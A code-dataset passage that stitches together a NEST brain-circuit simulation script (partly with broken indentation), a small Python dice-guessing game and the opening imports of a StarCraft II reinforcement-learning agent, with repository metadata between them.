connect(amygdala[amygdala_Glu], nac[nac_GABA1], syn_type=Glu, weight_coef=0.005)
connect(amygdala[amygdala_Glu], nac[nac_GABA0], syn_type=Glu, weight_coef=0.005)
connect(amygdala[amygdala_Glu], nac[nac_5HT], syn_type=Glu, weight_coef=0.005)
connect(amygdala[amygdala_Glu], nac[nac_NA], syn_type=Glu, weight_coef=0.005)
connect(amygdala[amygdala_Glu], nac[nac_Ach], syn_type=Glu, weight_coef=0.005)
connect(amygdala[amygdala_Glu], nac[nac_DA], syn_type=Glu, weight_coef=0.005)
connect(hypothalamus[hypothalamus_pvn_GABA], motor[motor_Glu0], syn_type=GABA, weight_coef=0.005)
connect(hypothalamus[hypothalamus_pvn_GABA], motor[motor_Glu1], syn_type=GABA, weight_coef=0.005)
connect(hypothalamus[hypothalamus_pvn_GABA], motor[motor_5HT], syn_type=GABA, weight_coef=0.005)
# inside LC
connect(lc[lc_Ach], lc[lc_GABA], syn_type=ACh, weight_coef=0.005)
connect(lc[lc_Ach], lc[lc_N0], syn_type=ACh, weight_coef=0.005)
connect(lc[lc_Ach], lc[lc_N1], syn_type=ACh, weight_coef=0.005)
connect(lc[lc_D1], lc[lc_N0], syn_type=DA_ex, weight_coef=0.005)
connect(lc[lc_D2], lc[lc_N1], syn_type=DA_in, weight_coef=0.005)
connect(lc[lc_GABA], lc[lc_N0], syn_type=GABA, weight_coef=0.005)
# * * * dorsal pathway * * *
connect(pgi[pgi_Glu], lc[lc_N0], syn_type=Glu, weight_coef=0.005)
connect(pgi[pgi_Glu], lc[lc_N1], syn_type=Glu, weight_coef=0.005)
connect(pgi[pgi_GABA], lc[lc_GABA], syn_type=GABA, weight_coef=0.005)
connect(prh[prh_GABA], lc[lc_GABA], syn_type=GABA, weight_coef=0.005)
connect(striatum[striatum_tan], lc[lc_GABA], syn_type=GABA, weight_coef=0.005)
connect(vta[vta_DA0], lc[lc_D1], syn_type=DA_ex, weight_coef=0.005)
connect(vta[vta_DA0], lc[lc_D2], syn_type=DA_in, weight_coef=0.005)
connect(vta[vta_DA1], striatum[striatum_tan], syn_type=DA_ex, weight_coef=0.005)
connect(vta[vta_DA1], striatum[striatum_GABA], syn_type=DA_ex, weight_coef=0.005)
wse = 0.001  # weight coefficient for excitatory serotonin connections
wsi = 0.5  # weight coefficient for inhibitory serotonin connections
#
# * * * NIGROSTRIATAL PATHWAY * * *
connect(motor[motor_Glu0], striatum[striatum_D1], syn_type=Glu, weight_coef=0.005)
connect(motor[motor_Glu0], snc[snc_DA], syn_type=Glu, weight_coef=0.005)
connect(motor[motor_Glu0], striatum[striatum_D2], syn_type=Glu, weight_coef=0.05)
connect(motor[motor_Glu0], thalamus[thalamus_Glu], syn_type=Glu, weight_coef=0.003) # 0.0008
connect(motor[motor_Glu0], prefrontal[pfc_5HT], syn_type=Glu, weight_coef=0.003) ######not in the diagram
connect(motor[motor_Glu0], motor[motor_5HT], syn_type=Glu, weight_coef=0.003) ######not in the diagram
connect(motor[motor_Glu0], stn[stn_Glu], syn_type=Glu, weight_coef=7)
connect(motor[motor_Glu1], striatum[striatum_D1], syn_type=Glu)
connect(motor[motor_Glu1], striatum[striatum_D2], syn_type=Glu)
connect(motor[motor_Glu0], thalamus[thalamus_Glu], syn_type=Glu)
connect(motor[motor_Glu1], stn[stn_Glu], syn_type=Glu)
connect(motor[motor_Glu1], nac[nac_GABA0], syn_type=GABA)
connect(striatum[striatum_tan], striatum[striatum_D1], syn_type=GABA)
connect(striatum[striatum_tan], striatum[striatum_D2], syn_type=Glu)
connect(striatum[striatum_D1], snr[snr_GABA], syn_type=GABA, weight_coef=0.001)
connect(striatum[striatum_D1], gpi[gpi_GABA], syn_type=GABA, weight_coef=0.001)
connect(striatum[striatum_D1], gpe[gpe_GABA], syn_type=GABA, weight_coef=0.005)
connect(striatum[striatum_D2], gpe[gpe_GABA], syn_type=GABA, weight_coef=1)
connect(gpe[gpe_GABA], stn[stn_Glu], syn_type=GABA, weight_coef=0.0001)
connect(gpe[gpe_GABA], striatum[striatum_D1], syn_type=GABA, weight_coef=0.001)
connect(gpe[gpe_GABA], striatum[striatum_D2], syn_type=GABA, weight_coef=0.3)
connect(gpe[gpe_GABA], gpi[gpi_GABA], syn_type=GABA, weight_coef=0.0001)
connect(gpe[gpe_GABA], snr[snr_GABA], syn_type=GABA, weight_coef=0.0001)
connect(stn[stn_Glu], snr[snr_GABA], syn_type=Glu, weight_coef=0.2)
connect(stn[stn_Glu], gpi[gpi_GABA], syn_type=Glu, weight_coef=0.2)
connect(stn[stn_Glu], gpe[gpe_GABA], syn_type=Glu, weight_coef=0.3)
connect(stn[stn_Glu], snc[snc_DA], syn_type=Glu, weight_coef=0.01)
connect(gpi[gpi_GABA], thalamus[thalamus_Glu], syn_type=GABA, weight_coef=1) # weight_coef=3)
connect(snr[snr_GABA], thalamus[thalamus_Glu], syn_type=GABA, weight_coef=1) # weight_coef=3)
connect(thalamus[thalamus_Glu], motor[motor_Glu1], syn_type=Glu)
connect(thalamus[thalamus_Glu], stn[stn_Glu], syn_type=Glu, weight_coef=1) # 005
connect(thalamus[thalamus_Glu], striatum[striatum_D1], syn_type=Glu, weight_coef=0.001)
connect(thalamus[thalamus_Glu], striatum[striatum_D2], syn_type=Glu, weight_coef=0.001)
connect(thalamus[thalamus_Glu], striatum[striatum_tan], syn_type=Glu, weight_coef=0.001)
connect(thalamus[thalamus_Glu], striatum[striatum_Ach], syn_type=Glu, weight_coef=0.001)
connect(thalamus[thalamus_Glu], striatum[striatum_GABA], syn_type=Glu, weight_coef=0.001)
connect(thalamus[thalamus_Glu], striatum[striatum_5HT], syn_type=Glu, weight_coef=0.001)
connect(thalamus[thalamus_Glu], nac[nac_GABA0], syn_type=Glu)
connect(thalamus[thalamus_Glu], nac[nac_GABA1], syn_type=Glu)
connect(thalamus[thalamus_Glu], nac[nac_Ach], syn_type=Glu)
connect(thalamus[thalamus_Glu], nac[nac_DA], syn_type=Glu)
connect(thalamus[thalamus_Glu], nac[nac_5HT], syn_type=Glu)
connect(thalamus[thalamus_Glu], nac[nac_NA], syn_type=Glu)
# * * * INTEGRATED PATHWAY * * *
connect(prefrontal[pfc_Glu0], vta[vta_DA0], syn_type=Glu)
connect(prefrontal[pfc_Glu0], nac[nac_GABA1], syn_type=Glu)
connect(prefrontal[pfc_Glu1], vta[vta_GABA2], syn_type=Glu)
connect(prefrontal[pfc_Glu1], nac[nac_GABA1], syn_type=Glu)
connect(amygdala[amygdala_Glu], nac[nac_GABA0], syn_type=Glu)
connect(amygdala[amygdala_Glu], nac[nac_GABA1], syn_type=Glu)
connect(amygdala[amygdala_Glu], nac[nac_Ach], syn_type=Glu)
connect(amygdala[amygdala_Glu], nac[nac_DA], syn_type=Glu)
connect(amygdala[amygdala_Glu], nac[nac_5HT], syn_type=Glu)
connect(amygdala[amygdala_Glu], nac[nac_NA], syn_type=Glu)
connect(amygdala[amygdala_Glu], striatum[striatum_D1], syn_type=Glu, weight_coef=0.3)
connect(amygdala[amygdala_Glu], striatum[striatum_D2], syn_type=Glu, weight_coef=0.3)
connect(amygdala[amygdala_Glu], striatum[striatum_tan], syn_type=Glu, weight_coef=0.3)
connect(amygdala[amygdala_Glu], striatum[striatum_Ach], syn_type=Glu, weight_coef=0.3)
connect(amygdala[amygdala_Glu], striatum[striatum_5HT], syn_type=Glu, weight_coef=0.3)
connect(amygdala[amygdala_Glu], striatum[striatum_GABA], syn_type=Glu, weight_coef=0.3)
# * * * MESOCORTICOLIMBIC PATHWAY * * *
connect(nac[nac_Ach], nac[nac_GABA1], syn_type=ACh)
connect(nac[nac_GABA0], nac[nac_GABA1], syn_type=GABA, )
connect(nac[nac_GABA1], vta[vta_GABA2], syn_type=GABA, )
connect(vta[vta_GABA0], prefrontal[pfc_Glu0], syn_type=GABA, )
connect(vta[vta_GABA0], pptg[pptg_GABA], syn_type=GABA, )
connect(vta[vta_GABA1], vta[vta_DA0], syn_type=GABA, )
connect(vta[vta_GABA1], vta[vta_DA1], syn_type=GABA, )
connect(vta[vta_GABA2], nac[nac_GABA1], syn_type=GABA, )
connect(pptg[pptg_GABA], vta[vta_GABA0], syn_type=GABA, )
connect(pptg[pptg_GABA], snc[snc_GABA], syn_type=GABA, weight_coef=0.005)
connect(pptg[pptg_ACh], vta[vta_GABA0], syn_type=ACh)
connect(pptg[pptg_ACh], vta[vta_DA1], syn_type=ACh)
connect(pptg[pptg_Glu], vta[vta_GABA0], syn_type=Glu)
connect(pptg[pptg_Glu], vta[vta_DA1], syn_type=Glu)
connect(pptg[pptg_ACh], striatum[striatum_D1], syn_type=ACh, weight_coef=0.3)
connect(pptg[pptg_ACh], snc[snc_GABA], syn_type=ACh, weight_coef=0.005)
connect(pptg[pptg_Glu], snc[snc_DA], syn_type=Glu, weight_coef=0.005)
if noradrenaline_flag:
logger.debug("* * * Making neuromodulating connections...")
# vt_ex = nest.Create('volume_transmitter')
# vt_in = nest.Create('volume_transmitter')
# NORA_synparams_ex['vt'] = vt_ex[0]
# NORA_synparams_in['vt'] = vt_in[0]
connect(nts[nts_a1], lc[lc_N0], syn_type=NA_ex, weight_coef=0.005)
connect(nts[nts_a1], bnst[bnst_Glu], syn_type=NA_ex, weight_coef=0.005)
connect(nts[nts_a2], lc[lc_N1], syn_type=NA_ex, weight_coef=0.005)
connect(nts[nts_a2], striatum[striatum_tan], syn_type=NA_ex, weight_coef=0.005)
connect(nts[nts_a2], striatum[striatum_GABA], syn_type=NA_ex, weight_coef=0.005)
connect(nts[nts_a2], amygdala[amygdala_Glu], syn_type=NA_ex, weight_coef=0.005)
connect(nts[nts_a2], amygdala[amygdala_Ach], syn_type=NA_ex, weight_coef=0.005)
connect(nts[nts_a2], amygdala[amygdala_GABA], syn_type=NA_ex, weight_coef=0.005)
connect(nts[nts_a2], bnst[bnst_Glu], syn_type=NA_ex, weight_coef=0.005)
connect(lc[lc_N0], motor[motor_Glu0], syn_type=NA_ex, weight_coef=0.005)
connect(lc[lc_N0], motor[motor_Glu1], syn_type=NA_ex, weight_coef=0.005)
connect(lc[lc_N0], prefrontal[pfc_Glu1], syn_type=NA_ex, weight_coef=0.005)
connect(lc[lc_N0], vta[vta_a1], syn_type=NA_ex, weight_coef=0.005)
connect(lc[lc_N0], ldt[ldt_a1], syn_type=NA_ex, weight_coef=0.005)
connect(lc[lc_N0], ldt[ldt_a2], syn_type=NA_ex, weight_coef=0.005)
connect(lc[lc_N1], striatum[striatum_tan], syn_type=NA_ex, weight_coef=0.005)
connect(lc[lc_N1], striatum[striatum_GABA], syn_type=NA_ex, weight_coef=0.005)
connect(lc[lc_N1], rn[rn_a1], syn_type=NA_ex, weight_coef=0.005)
connect(lc[lc_N1], rn[rn_a2], syn_type=NA_ex, weight_coef=0.005)
connect(rn[rn_a1], rn[rn_dr], syn_type=NA_ex, weight_coef=0.005)
connect(rn[rn_a2], rn[rn_mnr], syn_type=NA_ex, weight_coef=0.005)
connect(rn[rn_a2], rn[rn_rpa], syn_type=NA_ex, weight_coef=0.005)
connect(rn[rn_a2], rn[rn_rmg], syn_type=NA_ex, weight_coef=0.005)
# connect(vta[vta_a1], vta[vta_DA1], syn_type=NA_in, weight_coef=0.005)
if serotonin_flag:
    # * * * AFFERENT PROJECTIONS * * *
connect(vta[vta_5HT], rn[rn_dr], syn_type=SERO_ex, weight_coef=wse)
connect(septum[septum_5HT], rn[rn_dr], syn_type=SERO_ex, weight_coef=wse)
connect(septum[septum_5HT], rn[rn_mnr], syn_type=SERO_ex, weight_coef=wse)
connect(prefrontal[pfc_5HT], rn[rn_dr], syn_type=SERO_ex, weight_coef=wse)
connect(prefrontal[pfc_5HT], rn[rn_mnr], syn_type=SERO_ex, weight_coef=wse)
connect(hypothalamus[hypothalamus_5HT], rn[rn_rmg], syn_type=SERO_ex, weight_coef=wse)
connect(hypothalamus[hypothalamus_5HT], rn[rn_rpa], syn_type=SERO_ex, weight_coef=wse)
connect(periaqueductal_gray[periaqueductal_gray_5HT], rn[rn_rmg], syn_type=SERO_ex, weight_coef=wse)
connect(periaqueductal_gray[periaqueductal_gray_5HT], rn[rn_rpa], syn_type=SERO_ex, weight_coef=wse)
connect(bnst[bnst_5HT], rn[rn_rpa], syn_type=SERO_ex, weight_coef=wse)
connect(amygdala[amygdala_5HT], rn[rn_rpa], syn_type=SERO_ex, weight_coef=wse)
connect(amygdala[amygdala_5HT], rn[rn_rmg], syn_type=SERO_ex, weight_coef=wse)
connect(hippocampus[hippocampus_5HT], rn[rn_dr], syn_type=SERO_ex, weight_coef=wse)
# * * * EFFERENT PROJECTIONS * * *
connect(rn[rn_dr], striatum[striatum_5HT], syn_type=SERO_in, weight_coef=wsi) # !!!
connect(rn[rn_dr], striatum[striatum_D2], syn_type=SERO_in, weight_coef=wsi) # !!!
connect(rn[rn_dr], striatum[striatum_GABA], syn_type=SERO_in, weight_coef=wsi) # !!!
connect(rn[rn_dr], striatum[striatum_Ach], syn_type=SERO_in, weight_coef=wsi) # !!!
connect(rn[rn_dr], nac[nac_5HT], syn_type=SERO_in, weight_coef=wsi)
connect(rn[rn_dr], nac[nac_GABA0], syn_type=SERO_in, weight_coef=wsi)
connect(rn[rn_dr], nac[nac_GABA1], syn_type=SERO_in, weight_coef=wsi)
connect(rn[rn_dr], nac[nac_Ach], syn_type=SERO_in, weight_coef=wsi)
connect(rn[rn_dr], nac[nac_DA], syn_type=SERO_in, weight_coef=wsi)
connect(rn[rn_dr], snr[snr_GABA], syn_type=SERO_in, weight_coef=wsi)
connect(rn[rn_dr], septum[septum_5HT], syn_type=SERO_in, weight_coef=wsi)
connect(rn[rn_dr], thalamus[thalamus_5HT], syn_type=SERO_in, weight_coef=wsi) # ? tune weights
connect(rn[rn_dr], thalamus[thalamus_Glu], syn_type=SERO_in, weight_coef=wsi) # ? tune weights
connect(rn[rn_dr], lateral_cortex[lateral_cortex_5HT], syn_type=SERO_in, weight_coef=wsi)
connect(rn[rn_dr], entorhinal_cortex[entorhinal_cortex_5HT], syn_type=SERO_in, weight_coef=wsi)
connect(rn[rn_dr], prefrontal[pfc_5HT], syn_type=SERO_in, weight_coef=wsi) # !!!
connect(rn[rn_dr], prefrontal[pfc_Glu0], syn_type=SERO_in, weight_coef=wsi) # !!!
connect(rn[rn_dr], prefrontal[pfc_Glu1], syn_type=SERO_in, weight_coef=wsi) # !!!
connect(rn[rn_dr], prefrontal[pfc_DA], syn_type=SERO_in, weight_coef=wsi) # !!!
connect(rn[rn_dr], prefrontal[pfc_NA], syn_type=SERO_in, weight_coef=wsi) # !!!
connect(rn[rn_dr], lateral_tegmental_area[lateral_tegmental_area_5HT], syn_type=SERO_in, weight_coef=wsi)
connect(rn[rn_dr], lc[lc_5HT], syn_type=SERO_in, weight_coef=wsi)
connect(rn[rn_dr], lc[lc_N0], syn_type=SERO_in, weight_coef=wsi)
connect(rn[rn_dr], bnst[bnst_5HT], syn_type=SERO_in, weight_coef=wsi)
connect(rn[rn_dr], bnst[bnst_Glu], syn_type=SERO_in, weight_coef=wsi)
connect(rn[rn_dr], bnst[bnst_GABA], syn_type=SERO_in, weight_coef=wsi)
connect(rn[rn_dr], bnst[bnst_Ach], syn_type=SERO_in, weight_coef=wsi)
connect(rn[rn_dr], hippocampus[hippocampus_5HT], syn_type=SERO_in, weight_coef=wsi)
connect(rn[rn_dr], amygdala[amygdala_5HT], syn_type=SERO_in, weight_coef=wsi)
connect(rn[rn_dr], amygdala[amygdala_Glu], syn_type=SERO_in, weight_coef=wsi)
connect(rn[rn_dr], amygdala[amygdala_GABA], syn_type=SERO_in, weight_coef=wsi)
connect(rn[rn_dr], amygdala[amygdala_Ach], syn_type=SERO_in, weight_coef=wsi)
connect(rn[rn_mnr], vta[vta_5HT], syn_type=SERO_in, weight_coef=wsi) # !!! 0.005
connect(rn[rn_mnr], vta[vta_a1], syn_type=SERO_in, weight_coef=wsi) # !!! 0.005
connect(rn[rn_mnr], vta[vta_DA1], syn_type=SERO_in, weight_coef=wsi) # !!! 0.005
connect(rn[rn_mnr], thalamus[thalamus_5HT], syn_type=SERO_in, weight_coef=wsi) # ?
connect(rn[rn_mnr], thalamus[thalamus_Glu], syn_type=SERO_in, weight_coef=wsi) # ? tune weights 0.005
connect(rn[rn_mnr], prefrontal[pfc_5HT], syn_type=SERO_in, weight_coef=wsi)
connect(rn[rn_mnr], prefrontal[pfc_Glu0], syn_type=SERO_in, weight_coef=wsi)
connect(rn[rn_mnr], prefrontal[pfc_Glu1], syn_type=SERO_in, weight_coef=wsi)
connect(rn[rn_mnr], motor[motor_Glu0], syn_type=SERO_in, weight_coef=wsi)
connect(rn[rn_mnr], motor[motor_5HT], syn_type=SERO_in, weight_coef=wsi)
connect(rn[rn_mnr], insular_cortex[insular_cortex_5HT], syn_type=SERO_in, weight_coef=wsi)
connect(rn[rn_mnr], medial_cortex[medial_cortex_5HT], syn_type=SERO_in, weight_coef=wsi)
connect(rn[rn_mnr], neocortex[neocortex_5HT], syn_type=SERO_in, weight_coef=wsi)
connect(rn[rn_mnr], hypothalamus[hypothalamus_5HT], syn_type=SERO_in, weight_coef=wsi)
connect(rn[rn_mnr], hypothalamus[hypothalamus_pvn_GABA], syn_type=SERO_in, weight_coef=wsi)
connect(rn[rn_mnr], hippocampus[hippocampus_5HT], syn_type=SERO_in, weight_coef=wsi)
# * * * THALAMOCORTICAL PATHWAY * * *
connect(thalamus[thalamus_5HT], prefrontal[pfc_5HT], syn_type=SERO_in, weight_coef=wse)
connect(thalamus[thalamus_5HT], motor[motor_5HT], syn_type=SERO_ex, weight_coef=wse)
connect(thalamus[thalamus_5HT], motor[motor_Glu0], syn_type=SERO_ex, weight_coef=wse)
connect(prefrontal[pfc_5HT], thalamus[thalamus_5HT], syn_type=SERO_in, weight_coef=wsi) # main was 0.005
connect(motor[motor_5HT], thalamus[thalamus_5HT], syn_type=SERO_in, weight_coef=wsi) # main was 0.005
if dopamine_flag:
logger.debug("* * * Making neuromodulating connections...")
# NIGROSTRIATAL
connect(snc[snc_DA], striatum[striatum_D1], syn_type=DA_ex)
connect(snc[snc_DA], gpe[gpe_GABA], syn_type=DA_ex)
connect(snc[snc_DA], stn[stn_Glu], syn_type=DA_ex)
connect(snc[snc_DA], nac[nac_GABA0], syn_type=DA_ex)
connect(snc[snc_DA], nac[nac_GABA1], syn_type=DA_ex)
connect(snc[snc_DA], striatum[striatum_D2], syn_type=DA_in)
connect(snc[snc_DA], striatum[striatum_tan], syn_type=DA_in)
# MESOCORTICOLIMBIC
connect(vta[vta_DA0], striatum[striatum_D1], syn_type=DA_ex)
connect(vta[vta_DA0], striatum[striatum_D2], syn_type=DA_in)
connect(vta[vta_DA0], prefrontal[pfc_Glu0], syn_type=DA_ex)
connect(vta[vta_DA0], prefrontal[pfc_Glu1], syn_type=DA_ex)
connect(vta[vta_DA1], nac[nac_GABA0], syn_type=DA_ex)
connect(vta[vta_DA1], nac[nac_GABA1], syn_type=DA_ex)
if dopamine_flag and serotonin_flag and noradrenaline_flag:
# * * * DOPAMINE INTERACTION * * *
connect(prefrontal[pfc_5HT], prefrontal[pfc_DA], syn_type=SERO_ex, weight_coef=wse)
connect(prefrontal[pfc_DA], vta[vta_5HT], syn_type=DA_in, weight_coef=0.005)
connect(prefrontal[pfc_DA], vta[vta_DA1], syn_type=DA_in, weight_coef=0.005)
# connect(vta[vta_5HT], vta[vta_DA1], syn_type=SERO_in, weight_coef=0.005)
connect(vta[vta_5HT], vta[vta_DA1], syn_type=SERO_ex, weight_coef=wse)
connect(vta[vta_DA1], prefrontal[pfc_5HT], syn_type=DA_ex, weight_coef=0.005)
connect(vta[vta_DA1], prefrontal[pfc_DA], syn_type=DA_ex, weight_coef=0.005)
# connect(vta[vta_DA1], striatum[striatum_5HT], syn_type=DOPA_in, weight_coef=0.005)
connect(vta[vta_DA1], striatum[striatum_5HT], syn_type=DA_ex, weight_coef=0.005)
# connect(vta[vta_DA1], striatum[striatum_DA], syn_type=DOPA_in, weight_coef=0.005)
connect(vta[vta_DA1], striatum[striatum_D1], syn_type=DA_ex, weight_coef=0.005)
# connect(vta[vta_DA1], nac[nac_5HT], syn_type=DOPA_in, weight_coef=0.005)
connect(vta[vta_DA1], nac[nac_5HT], syn_type=DA_ex, weight_coef=0.005)
# connect(vta[vta_DA1], nac[nac_DA], syn_type=DOPA_in, weight_coef=0.005)
connect(vta[vta_DA1], nac[nac_DA], syn_type=DA_ex, weight_coef=0.005)
# connect(striatum[striatum_5HT], striatum[striatum_DA], syn_type=SERO_in, weight_coef=0.005)
connect(striatum[striatum_5HT], striatum[striatum_D1], syn_type=SERO_ex,
weight_coef=wse) # ??????????????????????????????????? D1, D2?
# connect(striatum[striatum_DA], snr[snr_GABA], syn_type=DOPA_in, weight_coef=0.005)
connect(striatum[striatum_D1], snr[snr_GABA], syn_type=DA_ex, weight_coef=0.005)
# connect(striatum[striatum_DA], snc[snc_DA], syn_type=DOPA_in, weight_coef=0.005)
connect(striatum[striatum_D1], snc[snc_GABA], syn_type=DA_ex, weight_coef=0.005)
connect(striatum[striatum_D1], snc[snc_DA], syn_type=DA_ex, weight_coef=0.005)
connect(nac[nac_5HT], nac[nac_DA], syn_type=SERO_ex, weight_coef=wse)
connect(snr[snr_GABA], snc[snc_DA], syn_type=SERO_in, weight_coef=wsi)
connect(snc[snc_GABA], striatum[striatum_5HT], syn_type=DA_in, weight_coef=0.005) # ?
connect(snc[snc_DA], striatum[striatum_5HT], syn_type=DA_in, weight_coef=0.005)
connect(snc[snc_DA], striatum[striatum_D1], syn_type=DA_in, weight_coef=0.005)
connect(snc[snc_DA], nac[nac_5HT], syn_type=DA_in, weight_coef=0.005)
connect(snc[snc_DA], nac[nac_DA], syn_type=DA_in, weight_coef=0.005)
connect(lc[lc_5HT], lc[lc_D1], syn_type=SERO_ex, weight_coef=0.005)
connect(lc[lc_D1], rn[rn_dr], syn_type=DA_ex, weight_coef=0.005)
# * * * NORADRENALINE INTERACTION * * *
connect(lc[lc_5HT], lc[lc_N0], syn_type=SERO_in, weight_coef=0.005)
connect(lc[lc_5HT], lc[lc_N1], syn_type=SERO_in, weight_coef=0.005)
# * * * EFFERENT * * *
# * * * CORTICOSPINAL TRACT * * *
# connect(motor[motor_Glu1], medulla[medulla_GABA], syn_type=GABA, weight_coef=0.01)
connectIn(motor[motor_Glu1], spine[spine_Glu1], syn_type=Glu)
connectIn(spine[spine_Glu1], nmj[nmj_Glu], syn_type=Glu)
# # * * * CORTICOBULBAR TRACT * * *
connect(motor[motor_Glu0], medulla[medulla_GABA], syn_type=Glu)
# # * * * RETICULOSPINAL TRACT * * *
connect(pons[pons_Glu], spine[spine_GABA], syn_type=Glu)
connect(medulla[medulla_GABA], spine[spine_GABA], syn_type=GABA)
# * * * AFFERENT * * *
# * * * SPINOTHALAMIC TRACT * * *
connect(cellBodies[cellBodies_Glu], spine[spine_Glu2], syn_type=Glu)
connect(spine[spine_Glu2], thalamus[thalamus_Glu], syn_type=Glu)
logger.debug("* * * Attaching spike generators...")
# #################################surprise
connect_generator(nts[nts_a1], 0., 250., rate=250, coef_part=1)
connect_generator(nts[nts_a2], 0., 250., rate=250, coef_part=1)
connect_generator(prh[prh_GABA], 0., 250., rate=250, coef_part=1)
connect_generator(pgi[pgi_GABA], 0., 250., rate=250, coef_part=1)
connect_generator(pgi[pgi_Glu], 0., 250., rate=250, coef_part=1)
connect_generator(ldt[ldt_a1], 0., 250., rate=250, coef_part=1)
connect_generator(ldt[ldt_a2], 0., 250., rate=250, coef_part=1)
connect_generator(ldt[ldt_Ach], 0., 250., rate=250, coef_part=1)
connect_generator(lc[lc_N0], 0., 250., rate=250, coef_part=1)
connect_generator(lc[lc_N1], 0., 250., rate=250, coef_part=1)
connect_generator(prefrontal[pfc_5HT], 0., 250., rate=250, coef_part=1)
connect_generator(motor[motor_5HT], 0., 250., rate=250, coef_part=1)
connect_generator(rn[rn_dr], 0., 250., rate=250, coef_part=1)
connect_generator(rn[rn_mnr], 0., 250., rate=250, coef_part=1)
connect_generator(cellBodies[cellBodies_Glu], 200., 500., rate=250, coef_part=1)
#
# ############################anger/rage
# connect_generator(nts[nts_a1], 400., 600., rate=250, coef_part=1)
# connect_generator(nts[nts_a2], 400., 600., rate=250, coef_part=1)
# connect_generator(prh[prh_GABA], 400., 600., rate=250, coef_part=1)
# connect_generator(pgi[pgi_GABA], 400., 600., rate=250, coef_part=1)
# connect_generator(pgi[pgi_Glu], 400., 600., rate=250, coef_part=1)
# connect_generator(ldt[ldt_a1], 400., 600., rate=250, coef_part=1)
# connect_generator(ldt[ldt_a2], 400., 600., rate=250, coef_part=1)
# connect_generator(ldt[ldt_Ach], 400., 600., rate=250, coef_part=1)
# connect_generator(lc[lc_N0], 400., 600., rate=250, coef_part=1)
# # connect_generator(lc[lc_N1], 400., 600., rate=250, coef_part=1)
#
# connect_generator(motor[motor_Glu0], 400., 600., rate=250, coef_part=1)
# connect_generator(pptg[pptg_GABA], 400., 600., rate=250, coef_part=1)
# connect_generator(pptg[pptg_Glu], 400., 600., rate=250, coef_part=1)
# connect_generator(pptg[pptg_ACh], 400., 600., rate=250, coef_part=1)
# connect_generator(amygdala[amygdala_Glu], 400., 600., rate=250, coef_part=1)
# connect_generator(snc[snc_DA], 400., 600., rate=250, coef_part=1)
# connect_generator(vta[vta_DA0], 400., 600., rate=250, coef_part=1)
##connect_generator(pons[pons_5HT], 400., 600., rate=250, coef_part=1)
##connect_generator(periaqueductal_gray[periaqueductal_gray_5HT], 400., 600., rate=250, coef_part=1)
##connect_generator(reticular_formation[reticular_formation_5HT], 400., 600., rate=250, coef_part=1)
logger.debug("* * * Attaching spikes detector")
for part in getAllParts():
connect_detector(part)
logger.debug("* * * Attaching multimeters")
for part in getAllParts():
connect_multimeter(part)
del generate_neurons, connect, connect_generator, connect_detector, connect_multimeter
endbuild = datetime.datetime.now()
simulate()
get_log(startbuild, endbuild)
save(GUI=status_gui)
|
[
"guyfulla@gmail.com"
] |
guyfulla@gmail.com
|
77aee12c7c33e199445d96492a54a4d8c66a7a51
|
3a4cc16bf5fa10feedbb26623f1df14594f05a25
|
/jogodedados.py
|
abd944c9571c6f8756414a25fd04e1fdaa173ffe
|
[] |
no_license
|
edsoncpsilva/Curso-Python
|
12f89ae0049e7909cab5e98ff9adbf3dfa003d25
|
939ccccb9f3beb5ee7a72fa96dfd0240fbd185fa
|
refs/heads/master
| 2020-03-24T02:21:57.707429
| 2018-08-17T20:19:45
| 2018-08-17T20:19:45
| 142,372,961
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,272
|
py
|
#==> six-sided dice game
#import library
import random
#variables
sair = 's'
qtd = 0
#interaction loop
while (sair == 's'):
    #interaction
    print()
    numero = int(input('Guess the number from 1 to 6 that will come up: '))
    nro_sorte = random.randrange(1, 7)
    if numero == nro_sorte:
        print('Right on, I am feeling lucky!!!!')
        print()
        exit()
    if numero > nro_sorte:
        print('Your guess was too high, try again')
        print()
    if numero < nro_sorte:
        print('Your guess was too low, try again')
        print()
    print('-'*70)
    print('==> Number drawn: ' + str(nro_sorte))
    print('-'*70)
    #validate the EXIT option
    ok = 'nok'
    while (ok == 'nok'):
        sair = input('Keep trying (s/n)? ')
        if sair == 's':
            ok = 'ok'
        if sair == 'S':
            sair = 's'
            ok = 'ok'
        if sair == 'n':
            ok = 'ok'
        if sair == 'N':
            sair = 'n'
            ok = 'ok'
        if ok == 'nok':
            print('Invalid option, type only "S" or "N"')
    #track the number of attempts
    if sair == 's':
        qtd = qtd + 1
        if qtd == 4:
            print()
            print('********************************************')
            print('***** exceeded the attempt limit of 4 *****')
            print('********************************************')
            sair = 'n'
print()
print('Game over !!!!')
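#a hedged alternative for the quit prompt above: ask_continue is a
#hypothetical helper; str.lower() collapses the four case branches into two
#while keeping the same accepted answers
def ask_continue():
    while True:
        answer = input('Keep trying (s/n)? ').lower()
        if answer in ('s', 'n'):
            return answer
        print('Invalid option, type only "S" or "N"')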
|
[
"noreply@github.com"
] |
noreply@github.com
|
1a701ab367bd7353d683543ba01c68dafb9c47e1
|
3536b829b5733807ffca9849e7ad463c43979c09
|
/sc2bot/agents/battle_agent.py
|
22e9a7bbc1b8d9e4a1550ce87856884d6aaf1e26
|
[] |
no_license
|
alanxzhou/sc2bot
|
9b8d33dacc32074a70b8b4007f60801d6ff8037c
|
0eb2a3f733ea31250e29a123213b407ad9189a40
|
refs/heads/master
| 2020-09-04T17:40:32.608263
| 2020-03-16T23:32:59
| 2020-03-16T23:32:59
| 219,835,624
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 12,381
|
py
|
from abc import ABC, abstractmethod
import copy
from collections import deque
import pickle
import matplotlib.pyplot as plt
import numpy as np
import os
import time
from pysc2.agents.scripted_agent import _xy_locs
from pysc2.agents.base_agent import BaseAgent
from pysc2.lib import actions
from pysc2.lib import features
from sc2bot.utils.epsilon import Epsilon
from sc2bot.utils.replay_memory import ReplayMemory, Transition
from sc2bot.models.nn_models import FeatureCNN, FeatureCNNFCLimited, FeatureCNNFCBig, BeaconCNN2
from sc2bot.agents.rl_agent import BaseRLAgent
import torch
import torch.nn as nn
import torch.optim as optim
_PLAYER_RELATIVE = features.SCREEN_FEATURES.player_relative.index
_PLAYER_FRIENDLY = 1
_PLAYER_NEUTRAL = 3 # beacon/minerals
_PLAYER_HOSTILE = 4
_NO_OP = actions.FUNCTIONS.no_op.id
_MOVE_SCREEN = actions.FUNCTIONS.Move_screen.id
_ATTACK_SCREEN = actions.FUNCTIONS.Attack_screen.id
_SELECT_ARMY = actions.FUNCTIONS.select_army.id
_NOT_QUEUED = [0]
_SELECT_ALL = [0]
